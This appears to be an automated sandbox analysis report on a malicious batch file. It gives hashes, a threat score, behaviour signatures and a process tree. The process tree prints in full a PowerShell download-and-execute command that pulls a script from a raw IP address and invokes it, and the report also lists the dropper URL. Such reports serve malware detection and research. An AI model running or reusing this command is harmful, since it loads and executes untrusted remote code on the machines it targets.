Analysis

  • max time kernel
    82s
  • max time network
    127s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    20-06-2020 08:10

General

  • Target

    f4bc334e44b117b825bf6ea74bf8306a.bat

  • Size

    213B

  • MD5

    77b3d11eb5df3e1e5555caf2db33be1c

  • SHA1

    1e66e03c4214e808d5d4b796d372938862be3cbd

  • SHA256

    94d5147f9349eb4d28ca422092c7f0d81b4085c4ca82d9a88e465ae8d38edea0

  • SHA512

    dba1003d91200c9f488ecf18ef70bd5177914c9a69d811185bcff4a7e0512419db4a7698cfc1a8618677c12d8f8d9b5322102e4bf8898a2c5314d48e34da7606

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/f4bc334e44b117b825bf6ea74bf8306a

Signatures

  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f4bc334e44b117b825bf6ea74bf8306a.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3788
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/f4bc334e44b117b825bf6ea74bf8306a');Invoke-NQONAR;Start-Sleep -s 10000"
      2⤵
        PID:3924
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 704
          3⤵
          • Program crash
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious behavior: EnumeratesProcesses
          PID:3900

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3900-1-0x0000000004FB0000-0x0000000004FB1000-memory.dmp

      Filesize

      4KB

    • memory/3900-8-0x00000000056E0000-0x00000000056E1000-memory.dmp

      Filesize

      4KB

    • memory/3924-0-0x0000000000000000-mapping.dmp

    • memory/3924-2-0x0000000000000000-mapping.dmp

    • memory/3924-3-0x0000000000000000-mapping.dmp

    • memory/3924-5-0x0000000000000000-mapping.dmp

    • memory/3924-4-0x0000000000000000-mapping.dmp

    • memory/3924-6-0x0000000000000000-mapping.dmp

    • memory/3924-7-0x0000000000000000-mapping.dmp